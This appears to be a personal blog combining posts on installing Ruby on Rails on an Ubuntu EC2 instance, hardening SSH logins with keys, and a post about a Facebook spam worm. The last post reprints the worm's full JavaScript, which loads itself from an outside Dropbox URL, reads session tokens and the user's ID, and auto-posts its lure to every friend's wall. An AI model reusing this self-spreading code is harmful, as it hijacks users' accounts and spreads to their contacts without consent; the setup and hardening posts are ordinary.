Rails from Scratch on Ubuntu 11.04

I will try and go through how I set up Ruby on Rails on a new ec2 instance. I will include in my explanation the errors I faced along the way and how I solved them in the hope that showing the wrong way and then the right way is more helpful than just the right way.

Ok.

Change the permissions on your key and use it to ssh into your ec2 instance.

$ chmod 600 mykey.pem
$ ssh -i mykey.pem ubuntu@####.us-west-1.compute.amazonaws.com

To find your system information:

$ cat /etc/*-release

Let’s start off by installing ruby.

$ sudo apt-get install ruby
$ ruby -v

Next we'll get ruby gems.

$ wget http://production.cf.rubygems.org/rubygems/rubygems-1.7.2.tgz
$ tar xzf rubygems-1.7.2.tgz
$ cd rubygems-1.7.2/
$ sudo ruby setup.rb

RubyGems installed the following executables:
	/usr/bin/gem1.8

Let's see if we can check what version of ruby gems we have.

$ gem -v

The program 'gem' is currently not installed.
$ gem1.8 -v
 1.7.2

We need a symlink

$ sudo ln -s /usr/bin/gem1.8 /usr/bin/gem
$ gem -v
 1.7.2

Now let's install rails.

$ sudo gem update --system
$ sudo gem install rails

$ rails --version
 Rails 3.0.7

Now the mysql server, if you want to use it later.

$ sudo apt-get install mysql-server

Use this to access the mysql server. -p will prompt you for the password.

$ mysql -uroot -p

Install git

$ sudo apt-get install git-core

Install apache

$ sudo aptitude install apache2

Now I'm going to make a small change to the configuration so you can see something on the web.

$ cd /etc/apache2
$ sudo vim apache2.conf

Uncomment this line:

ServerRoot "/etc/apache2"

Restart the server

$ sudo /etc/init.d/apache2 restart

Now visit your website!

http://ec2-#####.us-west-1.compute.amazonaws.com/

There should be something there, probably the basic apache starter page.

Now I'm going to try and install a rails app.

$ cd /var/www
$ sudo find . -exec chown ubuntu {} \;

Here I changed to the directory where I will have my website files, and changed the ubuntu user (which I was logged in as) to get owner permissions here instead of root.

$ rails new blog
$ cd blog
$ bundle install

Errors!

        /usr/bin/ruby1.8 extconf.rb
extconf.rb:3:in `require': no such file to load -- mkmf (LoadError)
	from extconf.rb:3

Solution:

$ sudo apt-get install ruby-dev

Now try again. This was what I eventually did to get it to work. It's possible you just may need to run "sudo bundle install." But we'll never know. Especially since every server configuration is very different.

$ bundle install
$ sudo apt-get install libsqlite3-dev
$ sudo apt-get install make
$ sudo gem install sqlite3-ruby --version=1.2.5
$ sudo gem install sqlite3
$ bundle install

Now I want to see if I can see the basic rails site from webrick default rails server.

$ rails server

Visit:

http://ec2-#####.us-west-1.compute.amazonaws.com:3000

Rails is installed. You really would set up a production server using mod_rails, but this is a first step!

Setting up User Accounts, Password Authentication, and SSH Keys on a New EC2 Instance

Based on an article from: http://blog.taggesell.de/index.php?/archives/73-Managing-Amazon-EC2-SSH-login-and-protecting-your-instances.html

After you have created your instance:

Save the Public DNS, it looks something like ec2-########-compute.amazonaws.com

After you have your keypair, run this command

$ ssh -i mykeypair.pem ubuntu@ec2-##########.compute-1.amazonaws.com

You should be in now. Cool.

Now set yourself up with your own user account.

$ sudo adduser jkeesh

adduser is the one you want; it sets the account up with the proper options. The first time I wrote this I used useradd.

(old version)

$ sudo useradd -m jkeesh

-m creates a home directory for the user

$ sudo passwd jkeesh

(end old version)

But you’re cool. You can be root too.

$ sudo visudo

under the line

root	ALL=(ALL) ALL

add yourself

jkeesh	ALL=(ALL) ALL

Just to show you that you can, enable password authentication

$ sudo vim /etc/ssh/sshd_config

and write (or uncomment)

PasswordAuthentication yes

Now reload that ssh configuration

$ sudo /etc/init.d/ssh reload

Now try logging out and logging back in with your new username, just to see that it worked.

$ ssh jkeesh@ec2-#######-compute.amazonaws.com

And run some sudo command to see that it worked too.

$ sudo your-favorite-command-that-you-can-only-do-with-special-privileges

Now we'll set up the public/private key so you can get rid of this password authentication nonsense.

If you have a public key called id_rsa.pub use scp to get it onto the server:

local$ scp ~/.ssh/id_rsa.pub jkeesh@ec2-#####.compute-1.amazonaws.com:/home/jkeesh

Now we will put it in the right place. You should be adding this key to the user’s authorized_keys file, but we don’t have that file yet, so we’ll just move it and set permissions.

$ mkdir .ssh
$ mv id_rsa.pub .ssh/authorized_keys
$ chmod 700 .ssh
$ chmod 600 .ssh/authorized_keys

Now you should be able to log in to your server without a password. Try it:

$ ssh jkeesh@ec2-#######.compute-1.amazonaws.com

At this point, if you are in, we can disable password authentication. We will also disable root login, for security.

$ sudo vim /etc/ssh/sshd_config

Find the lines for PasswordAuthentication and PermitRootLogin and change to no.

PasswordAuthentication no
..
PermitRootLogin no

$ sudo /etc/init.d/ssh reload
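
One thing to check before logging out: sshd uses the first uncommented occurrence of each keyword, so a "PasswordAuthentication yes" line written in earlier can silently override a "no" set further down the file. The script below is an added example, not part of the original post; the function names and the sample config are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post.
# sshd_config is first-match-wins: the first uncommented occurrence of a
# keyword in the global section is the value sshd uses.

# effective_value FILE KEYWORD -> prints the value in effect, or "unset"
effective_value() {
    awk -v want="$2" '
        BEGIN { want = tolower(want); result = "unset" }
        NF == 0 || $1 ~ /^#/ { next }            # blank lines and comments
        { sub(/[ \t]*=[ \t]*/, " ") }            # "Keyword=value" form is also legal
        tolower($1) == "match" { exit }          # conditional blocks: stop at the first
        tolower($1) == want { result = tolower($2); exit }
        END { print result }
    ' "$1"
}

# audit_sshd FILE -> returns 0 only if both settings from the post are "no"
audit_sshd() {
    rc=0
    for kw in PasswordAuthentication PermitRootLogin; do
        val=$(effective_value "$1" "$kw")
        if [ "$val" = "no" ]; then
            echo "ok    $kw $val"
        else
            echo "WARN  $kw $val"   # "unset" means sshd falls back to its default
            rc=1
        fi
    done
    return $rc
}

# Constructed sample: "yes" was written in near the top, and only the
# original line further down was changed to "no".
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
PasswordAuthentication yes
Port 22
#PermitRootLogin yes
PermitRootLogin no
PasswordAuthentication no
EOF

audit_sshd "$SAMPLE" || echo "password logins are still enabled"
```

On the server itself, "sudo sshd -t" checks the file for syntax errors before the reload and "sudo sshd -T" prints the configuration sshd resolved; keep your current session open until a fresh key-based login succeeds.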

That's a little bit for now on creating user accounts, changing ssh settings, and setting up public keys.

Wow, Facebook Hackers

So I saw a post on my wall from a friend, but something just didn’t sound right. Again, it was a case of the Facebook spam that somehow tricked you into posting something you didn’t want to post to all of your friends. And many people made the mistake, and it spread fast.

Mainly, it is impressive that these Facebook hackers were able to come up with this. It shows you how difficult of a problem security is for a big company like Facebook.

The hack was that they made a link which appeared to be from Facebook say “Remove this App” right next to common actions like “Like” or “Comment.” But this link was a link to a malicious piece of javascript which got a file from Dropbox and copied this post onto the walls of your friends.

I went to look at the file… which was here, http://dl.dropbox.com/u/10505629/verify.js. But then I went back and Dropbox had apparently taken it down about two minutes later. A fast response–but this message had probably already been replicated, idk, a hundred thousand times?

It seems to have been low damage, but it raises interesting security questions when people believe so readily the information that comes from their friends’ Facebook accounts. I just heard yesterday a case where a friend’s mom’s account had sent out a message about needing help and wiring money–and people fell for it.

I’m posting the js code below, since it is now not accessible — but with the swearing removed.

==== verify.js ======

var message = "-------------------- I hate you and the only way to remove all these posts is by disabling this below.";
var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://dl.dropbox.com/u/10505629/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
var myText = "Remove This App";

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
gf.send();
if(gf.readyState!=4){ }else{
	data = eval('(' + gf.responseText.substr(9) + ')');
	if(data.error){ }else{
		friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
	}
}
for(var i=0 ; i < friends.length ;  i++) {
	var httpwp = new XMLHttpRequest();
	var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
	var paramswp = "&__d=1&app_id=6628568379&extern=0&" +
				   "&post_form_id=" + post_form_id +
				   "&fb_dtsg=" + fb_dtsg +
				   "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
				   "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
				   "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
				   "&user_message=" + message;
	httpwp.open("POST", urlwp, true);
	httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	httpwp.setRequestHeader("Content-length", paramswp.length);
	httpwp.setRequestHeader("Connection", "keep-alive");
	httpwp.onreadystatechange = function(){
		if (httpwp.readyState == 4 && httpwp.status == 200){

		}
	}
	httpwp.send(paramswp);
}
alert("Failed to remove. ----------");
document.location = "";